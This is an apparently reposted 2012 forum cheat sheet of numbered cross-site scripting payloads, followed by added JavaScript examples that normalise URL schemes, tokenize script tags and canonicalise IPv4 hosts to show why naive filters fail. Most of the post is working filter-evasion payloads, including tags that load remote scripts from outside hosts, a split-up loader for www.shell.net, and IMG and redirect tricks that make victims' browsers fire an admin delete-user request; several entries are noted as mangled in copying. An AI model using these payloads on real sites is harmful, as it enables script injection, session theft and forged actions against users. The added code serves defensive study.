XSS cross-site scripting attack roundup

[复制链接]
跳转到指定楼层
楼主
Posted 2012-9-5 14:56:34
There doesn't seem to be much XSS material on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS with a JavaScript URL in SRC
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here): the quotes around XSS are written as &quot; entities
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode, no quotes needed in the payload (charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal character references, "UTF-8 Unicode encoding" in the original list (charcode calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit decimal character references, without semicolons (charcode calculator)
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal character references, also without semicolons (charcode calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting "javascript" (<TAB> stands for a literal tab character)
<IMG SRC="jav<TAB>ascript:alert('XSS');">

(12) Embedded encoded tab splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme case: the same payload with a line break after every single character
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a length limit (all the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2; null bytes basically have no effect here in China, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS ("/" separates the tag name from the attributes)
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open angle brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle bracket
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (a regex literal, read back through .source)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping out of a filtered JavaScript string
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the event-handler attribute is missing from the copied payload)
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted into "javascript" (code points 1-32 & 34 & 39 & 160 & 8192-8 & 13 & 12288 & 65279 are ignored by the browser); the inserted characters are invisible and did not survive copying, so the payload looks the same as (46)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression (IE)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough to make a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE variant (only the tail of the payload survived copying)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Inside the Flash, ActionScript can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image file and load that (the SRC value did not survive copying)
<SCRIPT SRC=""></SCRIPT>

(59) IMG with an embedded request: the browser fetches the URL with the victim's cookies, so whatever that GET does on the target site happens as the victim
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG with an embedded request through a redirect (a.jpg lives on your own server and redirects to the target)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing character filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL obfuscation: an IP address instead of a hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the percent-encoded hostname was decoded when this list was copied)
<A HREF="http://3w.org">XSS</A>

(70) IP as a single decimal number (this and the next two all resolve to 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the original also has tabs and a line break inside "http" and the host; the address is 66.102.7.147)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
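
The IMG payloads in entries (3) to (19), and the url() cases in (46) and (47) once the CSS has been parsed, all work for the same reason: the browser normalises the attribute value before it looks at the scheme. The block below is an added example written for this edit; it is not code from the post or from any cheat sheet. It reproduces that pipeline in JavaScript (numeric character-reference decoding as the HTML tokenizer does it, then the WHATWG URL parser's removal of tab/newline/CR and leading controls) and runs the post's payloads through it. The "legacy" mode and its ignored-character ranges are my reading of the garbled list in (47) and are an assumption; the function and sample names are mine.

```javascript
'use strict';

// Added example (not part of the original post): emulate what a browser does
// to a SRC/HREF value before deciding whether the scheme is "javascript".

// Step 1: decode numeric character references the way the HTML tokenizer
// does inside an attribute value.  "&#106;", "&#106" (no semicolon) and
// "&#x6A" are all accepted.  Named references are not handled here.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return '\ufffd';
    return String.fromCodePoint(cp);
  });
}

// Step 2: the WHATWG URL parser's pre-processing: trim leading/trailing
// U+0000..U+0020 and drop TAB/LF/CR anywhere.  A raw NUL in an attribute
// value has already become U+FFFD at tokenization time, which is why the
// null-byte trick of entry (17) no longer works in current browsers.
function urlPreprocess(s) {
  s = s.replace(/\0/g, '\ufffd');
  let a = 0, b = s.length;
  while (a < b && s.charCodeAt(a) <= 0x20) a++;
  while (b > a && s.charCodeAt(b - 1) <= 0x20) b--;
  return s.slice(a, b).replace(/[\t\n\r]/g, '');
}

// IE-era behaviour quoted in entry (47): any of these code points could sit
// inside "javascript".  The exact ranges are an assumption (my reading of
// the post's garbled list).
function legacyIgnored(cp) {
  return (cp >= 1 && cp <= 32) || cp === 34 || cp === 39 || cp === 160 ||
    (cp >= 8192 && cp <= 8207) || cp === 12288 || cp === 65279;
}
function legacyPreprocess(s) {
  return Array.from(s).filter(ch => !legacyIgnored(ch.codePointAt(0))).join('');
}

// The scheme the browser will actually dispatch on, lower-cased, or null
// when the value has no scheme (a relative URL).
function effectiveScheme(rawAttr, { legacy = false } = {}) {
  const decoded = decodeNumericRefs(rawAttr);
  const cleaned = legacy ? legacyPreprocess(decoded) : urlPreprocess(decoded);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

const DANGEROUS_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

// The check a sanitizer should make AFTER normalisation, never on the raw
// string: a blocklist for the literal text "javascript:" misses every
// sample below except the first.
function isSafeUrlAttr(rawAttr, opts) {
  const scheme = effectiveScheme(rawAttr, opts);
  return scheme === null || !DANGEROUS_SCHEMES.has(scheme);
}

// Constructed samples modelled on the post's IMG payloads.
const SAMPLES = [
  "javascript:alert('XSS')",                                                 // (3)
  "JaVaScRiPt:alert('XSS')",                                                 // (4)
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',  // (8)
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',        // (10)
  "jav&#x09;ascript:alert('XSS');",                                          // (12)
  "jav\nascript:alert('XSS');",                                              // (13)
  "   javascript:alert('XSS');",                                             // (19)
  "java\0script:alert('XSS')",                                               // (17)
  'http://3w.org/XSS/xss.js',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s).padEnd(72), '->', effectiveScheme(s),
              isSafeUrlAttr(s) ? 'allow' : 'block');
}
```

Run it with node; the null-byte sample comes back as scheme-less (harmless today) while every other javascript: variant is caught, and the nbsp form from (47) is only caught with `{ legacy: true }`.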
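
Entries (20) to (22) and (61) to (67) are aimed at filters that look for `<script`, whitespace and `src=` inside one run of non-`>` characters. The block below is an added example written for this edit, not code from the post: a cut-down HTML5 start-tag tokenizer that follows the WHATWG attribute-name and attribute-value states closely enough for these payloads, run side by side with such a regex filter. It is not a complete HTML parser, and the function and sample names are mine.

```javascript
'use strict';

// Added example (not part of the original post): what the browser's
// tokenizer sees versus what a "<script ... src=" regex sees.
const WS = /[\t\n\f\r ]/;

// Parse one start tag at `pos`.  Returns {name, attrs, end} or null.
function parseStartTag(html, pos = 0) {
  if (html[pos] !== '<') return null;
  let i = pos + 1;
  const m = /^[a-zA-Z][^\t\n\f\r />]*/.exec(html.slice(i));
  if (!m) return null;
  const name = m[0].toLowerCase();
  i += m[0].length;
  const attrs = {};
  for (;;) {
    // "/" and whitespace both separate attributes: <SCRIPT/XSS SRC=...>
    while (i < html.length && (WS.test(html[i]) || html[i] === '/')) i++;
    if (i >= html.length) return null;               // unterminated tag
    if (html[i] === '>') return { name, attrs, end: i + 1 };
    // Attribute name.  A leading "=" or a quote is a parse error but is
    // swallowed into the name; that is how the browser reads (62)-(64).
    let aname = '';
    if (html[i] === '=') aname += html[i++];
    while (i < html.length && !WS.test(html[i]) && !'/>='.includes(html[i])) aname += html[i++];
    aname = aname.toLowerCase();
    let value = '';
    while (i < html.length && WS.test(html[i])) i++;
    if (html[i] === '=') {
      i++;
      while (i < html.length && WS.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        // Quoted value: a ">" inside the quotes does NOT end the tag.
        const close = html.indexOf(q, i + 1);
        if (close < 0) return null;
        value = html.slice(i + 1, close);
        i = close + 1;
      } else {
        // Unquoted value ends at whitespace or ">".  A backtick is just a
        // character here, so entry (65) ends at the ">" right after it.
        while (i < html.length && !WS.test(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    if (!(aname in attrs)) attrs[aname] = value;    // first duplicate wins
  }
}

// The kind of blocklist these payloads were written against.
function naiveScriptSrcFilter(html) {
  return /<script\s[^>]*\bsrc\s*=/i.test(html);
}

// What a tokenizer-based filter sees: the src value, or null.
function tokenizerScriptSrc(html) {
  const tag = parseStartTag(html);
  return tag && tag.name === 'script' && 'src' in tag.attrs ? tag.attrs.src : null;
}

// Constructed samples copied from the post's entries.
const SAMPLES = [
  '<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>',     // (20)
  '<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>',         // (22)
  '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',       // (61)
  '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',        // (62)
  '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',     // (63)
  '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',   // (64)
  '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',       // (65)
  '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',    // (66)
];
for (const s of SAMPLES) {
  console.log(s.padEnd(58), 'regex:', naiveScriptSrcFilter(s),
              ' tokenizer src:', tokenizerScriptSrc(s));
}
```

The regex says "no script src" for all eight; the tokenizer finds the src in (20), (22), (61), (63) and (66). For (62), (64) and (65) it finds none, and that matches current browsers: under the HTML5 rules the tag ends at the first unquoted `>`, so those three only worked in the older parsers the list was written for.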
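
Entries (68) to (76) turn on what the browser accepts as a host. A filter that compares the host string literally is bypassed by the decimal, hex, octal and mixed-radix spellings; the check has to be made on the canonical form. The block below is an added example written for this edit, not code from the post: it implements the WHATWG URL IPv4 host parser (hex and octal components, a short last component filling the remaining bytes, trailing dot) and feeds it the post's addresses. Function and sample names are mine.

```javascript
'use strict';

// Added example (not part of the original post): canonicalise the host part
// of the A HREF targets in entries (68)-(76) the way the URL parser does.

// One dotted component: "0x.." is hex, a leading "0" is octal, else decimal.
// Returns null when the component is not a number at all.
function parseIPv4Number(part) {
  if (part === '') return null;
  let radix = 10;
  if (/^0x/i.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length > 1 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0;                       // "0x" on its own is zero
  const ok = { 10: /^[0-9]+$/, 8: /^[0-7]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return ok.test(part) ? parseInt(part, radix) : null;
}

// Canonical dotted quad, or null if `host` is not an IPv4 literal (it is
// then a DNS name such as "www.google.com.").
function parseLegacyIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();  // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some(n => n === null)) return null;
  // Every component but the last must fit in one byte; the last fills all
  // the remaining bytes, which is why "3232235521" alone is an address.
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let n = last;
  for (let i = 0; i < nums.length - 1; i++) n += nums[i] * 256 ** (3 - i);
  return [24, 16, 8, 0].map(sh => Math.floor(n / 2 ** sh) % 256).join('.');
}

// Host for an allow-list comparison: IPv4 literal -> dotted quad, otherwise
// the lower-cased name without the trailing dot of entry (76).
function canonicalHost(host) {
  return parseLegacyIPv4(host) || host.toLowerCase().replace(/\.$/, '');
}

// Constructed samples taken from the post: 192.168.0.1 written four ways,
// the mixed-radix form from (73), and two DNS names.
const SAMPLES = [
  '3232235521', '0xc0.0xa8.0x00.0x01', '0300.0250.0000.0001', '192.168.0.1',
  '66.000146.0x7.147', '127.0.0.1', 'www.google.com.', 'google.com',
];
for (const h of SAMPLES) console.log(h.padEnd(22), '->', canonicalHost(h));
```

Node's own `new URL('http://3232235521/').hostname` yields the same `192.168.0.1` by this algorithm; the value of writing it out is seeing which inputs become an address and which fall through to DNS. The protocol-relative form in (74) is a separate trap: it inherits the scheme of the page it is rendered on, so resolve it against the page URL before looking at the host.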